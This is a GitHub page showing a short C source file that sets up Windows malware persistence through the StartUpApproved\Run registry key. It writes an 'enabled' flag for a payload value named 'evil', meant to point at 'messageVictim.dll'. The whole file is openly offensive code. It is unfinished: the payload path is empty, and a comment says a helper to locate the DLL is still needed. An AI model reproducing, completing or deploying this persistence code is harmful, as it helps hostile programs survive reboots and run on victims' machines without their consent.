-
Notifications
You must be signed in to change notification settings - Fork 0
/
PersistenceApproved.c
26 lines (20 loc) · 1 KB
/
PersistenceApproved.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
Windows persistence via StartUpApproved
*/
#include <windows.h>
#include <stdio.h>
int main(int argc, char* argv[]) {
HKEY hkey = NULL;
BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartUpApproved\\Run";
// might need a function to get the location of messageVictim.dll
const char* evil = "";// path to where messageVictim.dll is stored.
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
printf(res != ERROR_SUCCESS ? "failed to open registry key :(\n" : "successfully opened registry key:)\n");
// Suggested code may be subject to a license. Learn more: ~LicenseLog:824261827.
res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value:)\n");
// close registry key
res = RegCloseKey(hkey);
return 0;
}